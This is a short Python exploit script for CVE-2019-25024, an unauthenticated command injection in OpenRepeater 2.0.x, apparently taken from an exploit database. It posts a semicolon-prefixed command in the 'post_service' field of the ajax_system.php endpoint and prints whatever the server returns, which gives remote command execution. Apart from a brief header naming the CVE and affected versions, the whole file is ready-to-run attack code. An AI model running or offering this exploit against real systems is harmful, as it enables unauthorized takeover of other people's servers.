#!/usr/bin/env python3.8 # Title: OpenRepeater (ORP) / Unauthenticated Command Injection # Date: 06/02/2019 # Discovered by: @codexlynx # Software homepage: openrepeater.com # Software version: Affected 2.0.x, Fixed 2.2.x # CVE ID: CVE-2019-25024 # Category: php, web, rce import urllib.request import urllib.parse import sys AJAX_SYSTEM_PATH = "openrepeater/functions/ajax_system.php" if len(sys.argv) < 3: print("Usage: %s ://

" % sys.argv[0]) sys.exit(1) url = "%s/%s" % (sys.argv[1], AJAX_SYSTEM_PATH) post_data = urllib.parse.urlencode({"post_service": ";%s" % sys.argv[2]}) req = urllib.request.urlopen(url, data=post_data.encode("ascii")) output = req.read() print(output.decode("utf-8"))